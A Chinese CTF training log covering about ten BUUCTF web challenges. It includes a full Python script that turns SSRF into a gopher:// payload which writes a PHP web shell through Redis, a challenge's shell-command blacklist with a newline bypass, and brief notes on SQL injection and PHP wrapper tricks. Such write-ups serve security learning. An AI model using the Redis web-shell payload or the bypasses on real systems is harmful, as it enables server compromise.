文章目录
- [GKCTF2020]EZ三剑客-EzWeb
- [FBCTF2019]RCEService
- [BSidesCF 2019]Kookie
- [CISCN2019 华北赛区 Day1 Web5]CyberPunk
- [极客大挑战 2019]Secret File
- [ACTF2020 新生赛]Include
- [强网杯 2019]随便注
- [SUCTF 2019]EasySQL
- [极客大挑战 2019]Havefun
- [护网杯 2018]easy_tornado
- 参考文章
[GKCTF2020]EZ三剑客-EzWeb
刚刚打开网页,通过隐藏参数发现个这个,啥东西???然后看了下wp发现是ssrf,好吧我没啥经验
![[BUUCTF]第三天训练日志_redis](/i/li/?n=2&i=images/blog/202210/26153603_6358e363d154715119.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
绕过了file协议,少了file://的两个//
![[BUUCTF]第三天训练日志_php_02](/i/li/?n=2&i=images/blog/202210/26153603_6358e363f1aa168126.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![[BUUCTF]第三天训练日志_php_03](/i/li/?n=2&i=images/blog/202210/26153604_6358e3641ac2094243.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
之后看了下wp说,是要打内网某主机。遂扫描d段得
![[BUUCTF]第三天训练日志_json_04](/i/li/?n=2&i=images/blog/202210/26153604_6358e3643ea4f38312.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
端口是6379
利用gopher协议打redis
'''
之后访问ip/shell.php即可
'''
import urllib
protocol = "gopher://"
ip = "173.228.247.12" # 运行有redis的主机ip
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "shell.php"
path = "/var/www/html"
passwd = ""
cmd = ["flushall",
"set 1 {}".format(shell.replace(" ", "${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0, "AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
CRLF = "\r\n"
redis_arr = arr.split(" ")
cmd = ""
cmd += "*" + str(len(redis_arr))
for x in redis_arr:
cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
cmd += CRLF
return cmd
if __name__ == "__main__":
for x in cmd:
payload += urllib.parse.quote(redis_format(x))
print(payload)
![[BUUCTF]第三天训练日志_redis_05](/i/li/?n=2&i=images/blog/202210/26153604_6358e36469b9796858.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[FBCTF2019]RCEService
题目源码
<?php
putenv('PATH=/home/rceservice/jail');
if (isset($_REQUEST['cmd'])) {
$json = $_REQUEST['cmd'];
if (!is_string($json)) {
echo 'Hacking attempt detected<br/><br/>';
} elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
echo 'Hacking attempt detected<br/><br/>';
} else {
echo 'Attempting to run command:<br/>';
$cmd = json_decode($json, true)['cmd'];
if ($cmd !== NULL) {
system($cmd);
} else {
echo 'Invalid input';
}
echo '<br/><br/>';
}
}
?>
preg_match只会去匹配第一行,所以这里可以用多行进行绕过
源码中可以看到putenv(‘PATH=/home/rceservice/jail’)已经修改了环境变量,我们只能用绝对路径来调用系统命令
cat命令在/bin中保存
所以构造出payload ,%0A是换行符
![[BUUCTF]第三天训练日志_redis_06](/i/li/?n=2&i=images/blog/202210/26153604_6358e3648bd0866349.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[BSidesCF 2019]Kookie
比较简单,但是我有点傻刚刚没想到这个
![[BUUCTF]第三天训练日志_php_07](/i/li/?n=2&i=images/blog/202210/26153604_6358e364ccbd235810.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
啊这这道题一点都不会,看了下师傅的WP
[极客大挑战 2019]Secret File
跟着题目提示一步一步来,太简单了,没啥意思
![[BUUCTF]第三天训练日志_redis_08](/i/li/?n=2&i=images/blog/202210/26153605_6358e3650ef2954144.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[ACTF2020 新生赛]Include
过于简单了,复习一下filter协议的使用
![[BUUCTF]第三天训练日志_json_09](/i/li/?n=2&i=images/blog/202210/26153605_6358e3654ee1f64334.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[强网杯 2019]随便注
复习了下预处理语句的使用吧还是很舒服哈哈哈,更改表名那个不太喜欢
![[BUUCTF]第三天训练日志_json_10](/i/li/?n=2&i=images/blog/202210/26153605_6358e365794d37178.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[SUCTF 2019]EasySQL
还是一个堆叠注入
![[BUUCTF]第三天训练日志_json_11](/i/li/?n=2&i=images/blog/202210/26153605_6358e36597d8a57425.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
啊这
![[BUUCTF]第三天训练日志_php_12](/i/li/?n=2&i=images/blog/202210/26153605_6358e365b74f847967.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
常规注入也不行我哭了啊啊啊,试一下预处理语句呐,再次失败
![[BUUCTF]第三天训练日志_php_13](/i/li/?n=2&i=images/blog/202210/26153605_6358e365d296751022.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接,但在mysql 缺省不支持。需要调整mysql 的sql_mode
模式:pipes_as_concat 来实现oracle 的一些功能
[极客大挑战 2019]Havefun
easy
![[BUUCTF]第三天训练日志_json_14](/i/li/?n=2&i=images/blog/202210/26153606_6358e3660999a16797.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
[护网杯 2018]easy_tornado
唯一需要注意的一点就是md5生成算法得用python,因为tornado模板是python的
![[BUUCTF]第三天训练日志_php_15](/i/li/?n=2&i=images/blog/202210/26153606_6358e366952dc68072.png?,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
参考文章
PHP利用PCRE回溯次数限制绕过某些安全限制